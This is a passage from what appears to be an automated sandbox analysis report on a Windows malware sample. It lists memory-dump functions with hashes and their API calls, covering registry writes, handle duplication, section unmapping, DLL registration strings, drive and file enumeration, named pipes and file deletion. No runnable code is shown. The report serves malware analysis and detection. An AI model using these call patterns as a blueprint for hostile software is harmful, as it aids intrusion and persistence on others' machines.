  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
